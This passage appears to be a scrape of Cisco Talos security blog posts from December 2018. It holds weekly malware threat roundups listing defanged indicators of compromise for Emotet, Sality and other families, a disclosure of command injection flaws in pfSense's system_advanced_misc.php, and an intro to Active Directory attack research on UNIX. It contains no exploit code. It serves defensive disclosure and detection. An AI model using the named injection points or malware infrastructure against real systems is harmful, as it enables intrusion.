1de14e103775d466cfe9222ba3305e254dc9e8c1efb4454343ab7ef1368cc91a
70e0962256b2f98bf5ee698be7805dff03789cecdcac79519d3a0b0f327beef7
d53aded580b952005cec23cf6e4a79de8775f5fab4ad8d1e715556499d3bd1cf
dd2b0957848a603fde2abb678f3cd9fd6a271b427c04b16708f13f10be691ab6
e470428e5c12292e0e6723c22c9b1deefa94ec8d182179118474239db192002d
e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f
ecbb1cacd8390963a669b92cdd6a78f3e3dfffa93e794dde7426d4ef2780fab4
f371a9934b7e07b03d3b8982fa3573b456504bf8a9ad5fc6c86801c8f40aa7cb
fd4098a016d0a192efaf640c7376ea29272313eaed35d386305a0c87bd092a70

Coverage

Screenshots of Detection

AMP

ThreatGrid

Malware

Xls.Dropper.Donoff-6758223-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

momdopre[.]top
fileiiiililliliillitte[.]xyz

Files and or directories created

%SystemDrive%\Documents and Settings\Administrator\My Documents\rnohht`t.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upd22ef67fa.bat
%LocalAppData%\Temp\0w4zsktj.rxt.psm1
%LocalAppData%\Temp\vnug35u0.1pd.ps1
%LocalAppData%\Temp\cmnt0etf.0lt.psm1
%LocalAppData%\Temp\l21izk2f.bel.ps1

File Hashes

0033f2a32856a043d34d491b0b79a3b1d25fbc084447ae801b94a6f4c8c67eec
0587d2fd8a94400a1a8f87a59111b4ec53c69ab7e4a50e6a4c7dd6eb7590e0b3
21df4279e0c9f6df6fb9ac8462e89ec9d2c777a3309dc9b8cf891a5232178800
405e08a4ab0c60f3ddc24dc4f4998bb654fbfae556163c9b70a2545cb79c4414
67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded
6816c39d57cf2008ddd7ff252d97b9eb372c9c70ae9ac1834aee5beb0c24208c
792436cb281c6704ea7f53f7532e7abdfa1370ecf071cb07fdf690f8f6469013
7c78d19e0f8fe4420346cf0d0033071bcb5bba18015fab8d3e40dc57a5565c7b
88ceeeed4a5d23e5c26c74300d2f1cc89376c09057ac848032b45e2777d15b3d
99b43c4080202b48a2a729ed28dac8e3b98cd837494b2e419d71e7693b0652b8
9a9d1c1b43c93982eaf304c3c7ecb361bede0ea811c23cddb8b13a39328f0c3c
9e8fb999bba4c93ae100c02ede01475ddbc2b7db624930574ed76ec5813dd451
bffbd9caa578af5caa98fcb20e0e5e4f55154e9e2ca256364c1f70538c04c5b9
d59e75ccdee3f0419fd247372697275fa45f391af8319a4cf1f56df411885805
dcbdf1859c62728c680ed7267f65b3a425aaed5c79b0f7404ef2e6541150d573
e723f535550c7c4398bbb29f16e76e7a59b8e314b0d0d602c96cda07da56cc17
ee5fb50a88b4b4a97bf82258cefc53e5de1bd416ddbdbee363dd9dc269ad867d
f60827889d806f6864b2af5e5c08c467c1f41b176ae47b51bb3918f5cafa68a9

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Trojan.Emotet-6758832-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses contacted by malware. Does not indicate maliciousness

67[.]216[.]131[.]134
88[.]235[.]54[.]71
24[.]190[.]11[.]79
192[.]208[.]165[.]34
98[.]6[.]145[.]178
207[.]244[.]67[.]214

Domain Names contacted by malware. Does not indicate maliciousness

Files and or directories created

%WinDir%\SysWOW64\4WPGc4HlcDQ.exe

File Hashes

3567201c7de66370aa8eb0bd6242b0ce6edf3d4326c2255828470407a2a124b3
3f2fa56542583680c7feeda31a5e16b85f11d74b710e6cb699ffcf15b6ca753a
40ef85a4108702a3af09f9047b66585ffa2c73458cf9177a6ca67b4d8f388050
529a8f391dd994779340aa59118b703256321bb421db138ee0b7db4265599b12
5f30eab9dbf08a80292bc5184b6ff8e0ef075806b3d1eb8f5b5c525ec3efc4e9
78ccba1d9e5d32658ce4cd4b2f8a8be65c6aa6a4f4eec2016777afb3a50ac843
7d42a037f8c824724e3525e40f09ae6b3f0eaca4278e4f0b95bb5ca50f008f7b
864b1ce8feeed53db144afae131da20601bdf2951e198827177d40a233c490bd
c1b6f751fda9de784eea8764525eda4ea0644492c1dd8f1da9fc34e5b26b95b6
c2ffeb181bc57e65011cb68ed33de62ef2ae79b12f320fa8362b096fe9f26430
d60149eb78e3df622e24afec34b06c7c4c1d26a401ec326ea5eaaa74df873e3b
e06807d11e7fba844ffe986638234633bfb93ccea283187b9019e0268b7876f4
f5e1c6d6d9bd26a6d0ae3b8657030dd40138e0371b824013821f48302e3f67f3
fe7d3a850371b6effe47525e39efbf705c4136e78b35f78228b1f986d30ceced

Coverage

Screenshots of Detection

AMP

ThreatGrid

Doc.Malware.Valyria-6757519-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

mnesenesse[.]com
ostrolista[.]com

Files and or directories created

%LocalAppData%\Temp\qrldddmq.hyb.psm1
%LocalAppData%\Temp\swfrthjc.vr1.ps1

File Hashes

0734985f67598ec0a0caf9ca31edd54bc93c5072ab0facc09f3d5164c8930afe
0ed8f1b95565876de24b49ab281f37d05d68130edc574ddd66300c5d5c9ad468
10aab8954d92baa70b29b5d9c13e0bc5f60d21bb34a00c45e963251516441aff
13707ac10ce41e2ec1547148c17a6186ff06009cd79789e01b879e96a5765f8a
15edcb2fc3b4d2fc1700f8e6837cd5c4759fb3791787c9cd9d0e16f129e0b234
173ee1fdd02789e581caa6858422f4afcf3cebcf4791e4e52c8ffda11ef726e4
1e1c3a6252578c94258f738d40ca36547631be604ad645e2c33a56cd26eab04b
2aa5876411a940b91e5091fffc10774063e93d9007bc5b75703747f1ff6737d9
35b3927d155688d396614850d95358c1d5b19e1d3487598788ffa1b881ecd156
4ddd6819b684653ebe12717f4c633d2aa6b249753ea2e9af9e886cd5abf599b0
500fe0e5847b6677fa8b91073d3c0fca1d80fef35cafd57b95634abab8973d42
52577b1c77ef1a8e21c3681d4610bf47fec5fbae0f751f3396dc349d23186de8
52fb2178d177421a16086155829b67154ddfc589ddc71a99b14f922741586479
54485288c4cc0956a765a7a0165b8c70066314baa98dfdfc088db0f82d611bee
5ac2183dc29d6cea617b06c5787019409662898e259f6b1c0c7465c69054bb26
608c215893b99203b2d355253d42b14fe0bae98b22a891cfa2950c79d8b4dfe1
61da1d5f5a0e508f1b79fee2a8ed00b37970f5c967cdfbf4a7933163752d777a
6b1ebcc59ca46e52be7f0b896898ef19577946da900f31145e1ae9d0451cf08f
6e005fab674754f7a84fa80b873d02d8c321cfdfa7dbb7661d9d03fbd5c943d0
6f9b7938e71ce992206f8a8c065159e36dfb26a5c146844a14c8689c68b46985
7665239ea5a4928f88cc39051fde78ad6ef2660a248bb57550fc3adb69d414bc
782071bd82d2a75149d55cf3a036add1a82349c42a77cecf17f5c74c3d535c04
8aeddfcdce551eede421e527a4f1183b6378ca7bfbea07e0f4810d8c60357cec
8eb3b092f7105734380156ddf60db8ab71d23270c55f7d9e98499bb11399b47a
8fb33dc484fcfc5440e175cce2fe3efe3b70cfd1e61f8dbce5a846e7271a8469

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Virus.Triusor-6757540-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

Files and or directories created

%WinDir%\Microsoft.NET\Framework\v1.1.4322\RegAsm.exe
%WinDir%\Microsoft.NET\Framework\v1.1.4322\ilasm.exe
%WinDir%\Microsoft.NET\Framework\v1.1.4322\jsc.exe
%WinDir%\Microsoft.NET\Framework\v1.1.4322\ngen.exe
%WinDir%\Microsoft.NET\Framework\v1.1.4322\vbc.exe

File Hashes

0bc3007209f850ac764646065dcc8fdd85c46425dc98d72631e51045ba36069c
14bc92fb1cb50fc6ffd2f34b701e57603fb99b96130c7e5b77187c2c3684a4db
249ac287cada8bab59c445a286a8edb645f58035681c788687979c17d7eb766f
3822de7241c17afa298071ab05ea0552456c7b9e78f2655b3471554f972520cf
3adbbb8794d8244bbc905ad9b7d54046e494374f1856447fd174869911f8ebd2
68d400f36ef0ac8869499a0185fc52a7d22add5a137fcdd9d73b7e47d8514049
6a897eacea0f1a6773d19c6b1dbd101db860e3f8df547d97392c98a6aef0cce5
6b34a29fcdf2ad7a74859ba38c3a622971c1bbdb6a1268d5c766fac441b9970d
8cee25864d734f6624754ba68d47d0d6573ce6d4ca55c2cf3025a1435bf84685
8f4bd4d1d9d337cfd8ffd0afe80213ae90063d274aad64b04aa8558b837218e6
9df2784ba1fd594ab90357d799b26e0fa3abca65a5744ce3d62993d74b0f7e0f
9e76c9877cb6820ff88937ee158cd59cbe16b9eb26526f0f1ec39d09601dca05
a3168cb7b3fd30eed135ba086e9e96984f56fd52317d185f3e988176440a5a25
db6317729cabcb31a4be51a3cc281bffc5dd38a8164861c4d7fe7a0be386f892
dc8c46a57c38955f4b6356d29662beeb0f88eeca50a94191df8892efab3bfc2e
ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59

Coverage

Screenshots of Detection

AMP

ThreatGrid

↧

Vulnerability Spotlight: Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability

December 3, 2018, 11:51 am

≫ Next: An introduction to offensive capabilities of Active Directory on UNIX

≪ Previous: Threat Roundup for Nov. 23 to Nov. 30

Brandon Stultz of Cisco Talos. of Cisco Talos discovered these vulnerabilities.

Executive summary

Today, Cisco Talos is disclosing a command injection vulnerability in Netgate pfSense system_advanced_misc.php powerd_normal_mode. pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Netgate to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4019)

This command injection vulnerability in Netgate pfSense is due to lack of sanitization on the 'powerd_normal_mode' parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_normal_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.

Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4020)

A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization on the 'powerd_ac_mode'parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_ac_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.

Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4021)

A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization on the powerd_battery_mode', parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_battery_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.

Conclusion

Cisco Talso tested and confirmed that Netgate pfSense CE 2.4.4-RELEASE is affected by these vulnerabilities.

https://www.pfsense.org/security/advisories/pfSense-SA-18_09.webgui.asc

Coverage

↧

An introduction to offensive capabilities of Active Directory on UNIX

December 4, 2018, 8:21 am

≫ Next: Threat Roundup for Nov. 30 to Dec. 7

≪ Previous: Vulnerability Spotlight: Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability

Tim Wadhwa-Brown of Portcullis Labs authored this post.

In preparation for our talk at Black Hat Europe, Security Advisory EMEAR would like to share the background on our recent research into some common Active Directory integration solutions. Just as with Windows, these solutions can be utilized to join UNIX infrastructure to enterprises' Active Directory forests.

Background to active directory integration solutions

Having seen an uptick in unique UNIX infrastructures that are integrated into customers' existing Active Directory forests, the question becomes, "Does this present any concerns that may not be well understood?" This quickly became "What if an adversary could get into a UNIX box and then breach your domain?"

Within a typical Active Directory integration solution (in this case SSSD), the solution shares a striking similarity to what a user might see on Windows. Notably, you have:

DNS – Used for name resolution
LDAP – Used for "one-time identification" and assertion of identity
Kerberos – Used for ongoing authentication
SSSD – Like LSASS
PAM – Like msgina.dll or the more modern credential providers

You can see a breakdown of this process here. Unlike Windows, there is no Group Policy for the most part (with some exceptions), so policies for sudo et al. are typically pushed as flat files to hosts.

Our research

Realistically, the threat models associated with each part of the implementation should be quite familiar to anyone securing a heterogeneous Windows network. Having worked with a variety of customers, it becomes apparent that the typical UNIX administrator who does not have a strong background in Windows and Active Directory will be ill-equipped to handle this threat. While we've been talking about successful attacks against components such as LSASS and Kerberos for quite some time, Mimikatz dates back to at least April 2014, and dumping hashes has been around even longer. Pwdump, which dumped local Windows hashes, was published by Jeremy Allison in 1997). However, no one has really taken a concerted look at whether these attacks are possible on UNIX infrastructure, nor how a blue team might spot an adversary performing them.

As a result of this research, we were able to develop tactics, tools, and procedures that might further assist an attacker in breaching an enterprise, and we began documenting and developing appropriate strategies to allow blue teams to appropriately detect and respond to such incursions. The presentation and tactics, tools, and procedures for this talk will be available after our Blackhat EU talk. They will also be available here, and at our GitHub repo.

↧

Threat Roundup for Nov. 30 to Dec. 7

December 7, 2018, 11:44 am

≫ Next: in(Secure) messaging apps — How side-channel attacks can compromise privacy in WhatsApp, Telegram, and Signal

≪ Previous: An introduction to offensive capabilities of Active Directory on UNIX

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 30 and Dec. 07. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

Xls.Downloader.Sload-6774021-0
Downloader
The Sload downloader launches PowerShell and gathers information about the infected system. The PowerShell may download the final payload or another downloader.
Doc.Downloader.Emotet-6765662-0
Downloader
Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails and saw a resurgence recently during Black Friday.
Win.Ransomware.Imps-6765847-0
Ransomware
This is a trojan horse virus that may steal information from the affected machine and download potentially malicious files that spread via removable drives.
Win.Virus.Sality-6765491-0
Virus
Sality is a file infector that establishes a peer-to-peer botnet. Although it's been prevalent for more than a decade, we continue to see new samples that require marginal attention in order to remain consistent with detection. Once a Sality client bypasses perimeter security, its goal is to execute a downloader component capable of executing additional malware.
Win.Packed.Passwordstealera-6765350-0
Packed
This malware has the ability to harvest stored credentials, keystrokes, screenshots, network activity, and more from computers where the software is installed.
Doc.Downloader.Sagent-6766662-0
Downloader
Sagent launches PowerShell through macros in Microsoft Office documents. The PowerShell then downloads unwanted software from remote websites.

Threats

Xls.Downloader.Sload-6774021-0

Indicators of Compromise

Registry Keys

Mutexes

KYTransactionServer.MutexObject.Administrator

IP Addresses contacted by malware. Does not indicate maliciousness

216[.]239[.]34[.]21
64[.]210[.]137[.]102

Domain Names contacted by malware. Does not indicate maliciousness

ipinfo[.]io
images2[.]imgbox[.]com

Files and or directories created

%LocalAppData%\Temp\psefaeec.nvt.psm1
%LocalAppData%\Temp\yb31jdzi.jxl.ps1
%UserProfile%\Documents\20181205\PowerShell_transcript.PC.ZR0bVMzf.20181205131554.txt
%LocalAppData%\Temp\CVR1B6D.tmp

File Hashes

06f128b08f332142a5e0cb8d6c26a780316623ff62673684ccb9f37f98e3f87e
07b4dc36a3389ef60f3444bde94f6b9440e6cd2d658671096d01e4909a0044e3
0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540
132a3cf5d1534553294af816d2796d21c2a7a379eb3fbe6f67e8fda895a68a77
15c3daf032053b55a6bc280ddbdadfa668172a43609da78a421856b5f84f1381
24ccc8f6607e2577e1fa9e3f3cb474e6a309f420765bff7d64a38ba1c6a2d508
393326257ec1f08c2379a375308e0b5a6879ffdb8d68362f46a6a56f2fa9c0b1
3bfb9adbd0af64301780ae06f4db63fcceb21dad38a8df0f6023c60d51fc71ac
42728401a73b538b441d0643b302122f03960a26d8f2513af5a780e24bfe9817
511b09caf3e19d96a2e8606c35ef9e39e18903e7895ae225dd7807cd46d50c21
55e145df9b9668105f52c6f61e5ca6d421edf7fa1856af1162452a7dce6b6e3c
5dfe4ad7cc7866e81248aa06e2c8204f6007e9694a5d1a4d6739d9a313ed249f
5f8fd3edd5feaf3bf12702d0bec48df5710bac2770b59aedeec46c563f2f4df9
6a7e95ffccb39bce1203731899b14adba3afd79d7bda7f783256011c510ffd0a
74a2bd67f90c0d6d906286d4aea6de32bd9bfb05ac631de15b8429758573d22f
7559d01473ed8f6a5d101e39ca32f5d2a975a018a017100967417c5ca8f5f578
983b13f4ae9b8b9dbb6fd5e4fa024e862628bd748d2ece92cf4b4c2048d88ad7
b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a
d23817b23214e53ee9400e9a307b522add72c875d3c98ba397525ac11c963379
f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1

Coverage

Screenshots of Detection

AMP

ThreatGrid

Malware

Doc.Downloader.Emotet-6765662-0

Indicators of Compromise

Registry Keys

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\mwarepwd

Mutexes

IP Addresses contacted by malware. Does not indicate maliciousness

144[.]217[.]184[.]168
198[.]0[.]36[.]237
162[.]220[.]11[.]30
216[.]198[.]175[.]99
71[.]179[.]135[.]10
184[.]168[.]177[.]1
72[.]167[.]191[.]65
77[.]221[.]130[.]34
179[.]188[.]11[.]22
74[.]79[.]252[.]106

Domain Names contacted by malware. Does not indicate maliciousness

p3nlhclust404[.]shr[.]prod[.]phx3[.]secureserver[.]net
ejercitodemaquinas[.]com
jsplivenews[.]com
dealnexus[.]intralinks[.]com
gvmadvogados[.]com[.]br
infobox[.]ru
chstarkeco[.]com
www[.]infobox[.]ru
www[.]legal500[.]com
g-steel[.]ru
www[.]gvmadvogados[.]com[.]br

Files and or directories created

%LocalAppData%\Temp\GmP.exe
%TEMP%\GmP.exe
%LocalAppData%\Temp\hu3xyaa3.0rw.ps1
%LocalAppData%\Temp\mz5ranh3.2bk.psm1
%LocalAppData%\Temp\CVR2D3B.tmp
%LocalAppData%\Temp\~DFA8496BB3134EB884.TMP
%WinDir%\SysWOW64\YC4GWpe1p4Ot.exe
%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@gvmadvogados.com[1].txt
%SystemDrive%\~$4550683.doc

File Hashes

0da3104bfc37f64817dbbb0f5fd699c19db913b2a2f5c6f883b0813f1669638a
1ca11cdd2bafbcd28491f6e46e1a2dfd9c435effb2ac941c7d164114d82d2aec
21694e71a6d384e5080e422ca98dd16a52c39e430bfdec1732b3706c480914e9
25fafc8f6d6819add0f2f907d1cf8a760ea0e4256b5a9997ebae705a7f40691e
434a1520a7608017e839ecd8804d04ef5d53d0b1dfaae1e8865383510cb314ca
46c708f3468052469785a18c61440521d05eeeb48625122b2f0879924fcf19a2
4e03038cd03633b18f289487b717e6f9b75315c382794c73943092f6a90d170b
6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921
6311b3f0767a57f8c7ee0c6e317fad84bc9d39a12e48f28505ecddc842a66095
8286c59c07e75f97219bf649077d3ea44f497e715376fa867fec38fc34917ae8
9248345ccc78b67a968c1f2082916ee58d0ce5642698a7a6e2f830f65937bc8d
95696fdc9073bbb5feb71da630fa3c1f2255c3f7025bce4bc2ce7a0bda261bdf
c060f2d8dc9a46d2805e514584fcdf02e39e2e56110c2ef0f0464e2ae40d3842

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Ransomware.Imps-6765847-0

Indicators of Compromise

Registry Keys

Mutexes

Global\LOADPERF_MUTEX
DSKQUOTA_SIDCACHE_MUTEX

IP Addresses contacted by malware. Does not indicate maliciousness

185[.]9[.]147[.]4

Domain Names contacted by malware. Does not indicate maliciousness

s142814[.]smrtp[.]ru

Files and or directories created

%LocalAppData%\Temp\98B68E3C.zip
%AppData%\Microsoft\Network\srcc.exe
%AppData%\Microsoft\Windows\audiohq.exe
%System32%\Tasks\ApplicationUpdateCallback
%System32%\Tasks\System\Security\upjf
%System32%\Tasks\System\smartscreen

File Hashes

504c6e964c591cd6b4aac5193600058863a5c3c3b9ae7e5756315114fb032a11
52691c9c33c0b2707d74cca5738a15313ccd5264279a20933886a1f4d60aaea1
6acf9095e1f5725380bdac7fd7d1d9f07fdb44daa4682c2c8ef001094252d699
8c84a6d109b529446bb89ae69175f848579699bfc0bcb6dd23a2cdfd31b48f43
8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db
982024167a8bc0e5f6fce2b476655b91c821d09f324f95e77f0d38358d1a881b
9c2d5ab12e6f67faae5444007b9135834af71cc5e23c53801fa39877b9068101
9c4780fa358ee65ac1f2361e1e2757f475674145977bfb8a43870538dd6f85ca
a3786fbfefcdec86bfb9ea1f4d14faa1285dab5bc846ba556b6b9ba3c974c420
ca7073947e41d18d30565366df2522f12bbeb0d4a856e1572d654a3d569bd3ce
d2482568a93e5755ff97a8a481e92db8d3f2e4995ee310645f9a1951a9075250

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Virus.Sality-6765491-0

Indicators of Compromise

Registry Keys

<HKLM>\SOFTWARE\WOW6432NODE\Creative Tech
<HKLM>\SOFTWARE\WOW6432NODE\CREATIVE TECH\Installation
<HKLM>\SOFTWARE\Creative Tech

Mutexes

csrss.exeM_328_
lsass.exeM_428_
smss.exeM_204_
svchost.exeM_840_
wininit.exeM_320_
winlogon.exeM_356_

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

Files and or directories created

%System16%.ini
%SystemDrive%\autorun.inf
%System32%\CmdRtr64.DLL
%WinDir%\Temp\CRF000\APOMgr64.dll
%WinDir%\Temp\CRF000\APOMngr.dll
%WinDir%\Temp\CRF000\CmdRtr.dll
%WinDir%\Temp\CRF000\CmdRtr64.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bkhxl.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pelbwv.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\scih.exe
%WinDir%\Temp\CRF000\creaf_ms.cab
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlinwq.exe
%WinDir%\Temp\CRF000\mint.ini
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbdaue.exe
%WinDir%\Temp\CRF000\mint32.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbhys.exe
%WinDir%\Temp\CRF000\mint64.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbqckk.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wincsbehn.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfudq.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winimau.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjcsnxu.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkggnjk.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkmdt.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wintyttku.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winvcpbm.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winxraoo.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xatik.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xovxjg.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ydgy.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ysrnph.exe
%System32%\drivers\oiihn.sys

File Hashes

055dd786fbb1c16e793f806368aa0f05ab7ef45db767fe5a7a829f11da37da0a
14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f
1daef9e1a3fe804680acf7e0a64724d4c106fea7aba46d437738b7ab72cff59d
3b6a5842eeab177d8d869f8eac9aea7342cb1117ac063e4cc2e3c4298107b028
5d83a8691b914f3971c6b91e8c82803b479ae70756cfbeb987ddb842eb399d8a
88f585ed82535a991dee6b054caf7efd9f4bb54acdde8fdf7d05eba8997d1058
973dbe64453445eb82a2e619842f46c8ed3e6ca74533db582b472e79bc01601c
a28cd979f9395cc482d9de5d7fd676a379e97920a37784763bfb72f348556cdb
d746b850bf25ef3872d33c3b0067910b8d075a0bed0af89c3c14ecd2efee3fab
f2864685d01a793c2e76191d3be5278b6e1d59a9fb5b20e7a229e3d634108c8c
f6c27d2fdfed0a6b67e5aee197388797ef77a4cece21c849ac096d075dbd93c9

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Packed.Passwordstealera-6765350-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses contacted by malware. Does not indicate maliciousness

173[.]194[.]175[.]108
104[.]16[.]17[.]96

Domain Names contacted by malware. Does not indicate maliciousness

Files and or directories created

\??\E:\Sys.exe
\??\E:\autorun.inf
%LocalAppData%\Temp\holderwb.txt
%LocalAppData%\Temp\holdermail.txt
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dw.log
%LocalAppData%\Temp\bhvBB7A.tmp

File Hashes

02e17144bd22b469828d3a6663ce5ec0c87e24e729322cb97cacbcb4b2949033
02fc82a18398f81deaee007c20d90e0e3c9722b30d2698f90e796023fc5e1740
04757c1d814ad34c90bdee0993b86a0b33301abffaee9818310341a950cb9815
0496858beb4cfd6709dff2122d85e33245ff41ec53831b8fcce61fc5702bef74
04f66de839722231e20ae25ced41dca0f5e62d1e50b0accca5b65b192d6e4c58
0526201aa5028da43a2e3d8192c2d62c6953e4f940a631a6365099a22c934200
055b60ff72bbfc431a15134e7dac00b64a3ba6f53f8041b62d3676e2c0e517fc
05a3db5d7b308fde9e5763fc960d88463eb1c517a1a645e9cd38229269bf1627
05e18862ebc7be845735b589227ee2ae63ee66bc7ffb3755c52a8f84495d80db
06b95f87826fe1272911920412ad972b931c31b1c785fa27ec05c177382da0b6
06c4d3945b94f611019fc283b93fd63fb3f8405796db59cb5f8222782d0c7ea4
0826278ce6120f1730ff87aa84ded08db3f6941cc910f46d9f57957ecf699049
092c6895af99df4b4c094f62e3a92d6d8bf0088844b4b6bbf691bb4f625850d3
0a46824e179fb9eb61835adb9c9a02919bf41a756f9dbf120cbaed51acf17166
0a82eb0c8e3d7c2334c4eff82dc394f65654bf72b8ceb6e9d940d90ed3a6ba0a
0af37d3cb266570cc11f48a4eff5fc4cc4636b7b180801e4cd677bd2d29ce22a
0b5552c57c06a47fe86276ff15b2695ac2e9dcc6cad5f98f2ba5c43e14932b89
0cbb8c5cac42acaaf4136770140177fe6261271ec1d035cd433a8b9a97e602d7
0cff7e9d13a3216254aba643143dd218ca25ec2a503be1516f97a10fed1a151c
0d07f7c0463a4db0108f63464284c6f278b5ebce3252c8c5172f51e123208d7f
0e187bb3f6a4c196a92d1ccdcdc0db28861a0be845f0930a9eb308d27489755f
0e428856132a0fc043f63994abd9cf9fe06975a21f16187d1758af8b73785b1e
0e4a73fe7c720fa7b00134247ba8aae22ff6cf3cb4edfd994fb599c102462b4b
0f4682294cea6ff676cc6aa4fbec8fb899bd3bda0b8f73c51e116304a85d5358
0f5a78e562be95f13a1fd161b81f11f142e560758b48f12b631b83a38645817e

Coverage

Screenshots of Detection

AMP

ThreatGrid

Doc.Downloader.Sagent-6766662-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses contacted by malware. Does not indicate maliciousness

144[.]217[.]96[.]196
68[.]66[.]224[.]4
188[.]40[.]14[.]253
185[.]45[.]66[.]219
192[.]185[.]122[.]50

Domain Names contacted by malware. Does not indicate maliciousness

www[.]creativeagency[.]biz
mandujano[.]net
biogas-bulgaria[.]efarmbg[.]com
mahimamedia[.]com
www[.]brgsabz[.]com
creativeagency[.]biz

Files and or directories created

%LocalAppData%\Temp\zUw.exe
%LocalAppData%\Temp\dxaf1lgn.ghy.ps1
%LocalAppData%\Temp\mj5uf2iy.ilx.psm1
%LocalAppData%\Temp\CVRE3A0.tmp
%LocalAppData%\Temp\~DF21FCDFAA58A2E1E9.TMP
\TEMP\~$c0d21bd6c8e28fdebd78dd6505135b6cca400773990a89056de054ed7cbe29.doc

File Hashes

0093dcbd8f4bbe4b06e73de6de547ad5993077a113a44c4323a976433246b86b
0842492265ff119471f0caa69725591341898fde26bf968bbd5471470154cd3b
201227dd0b8a0fa4b3d9b9cddf1f209c6de1addda9bff6adce66a626838f7e66
25884a9b024598d9acedc91f15fd6297cba4dc3f704d6a19f626c86e69667e17
29932262d4afc2f1c90346e826a4df4d56f18bce251fb70993d6d601ffbe51ec
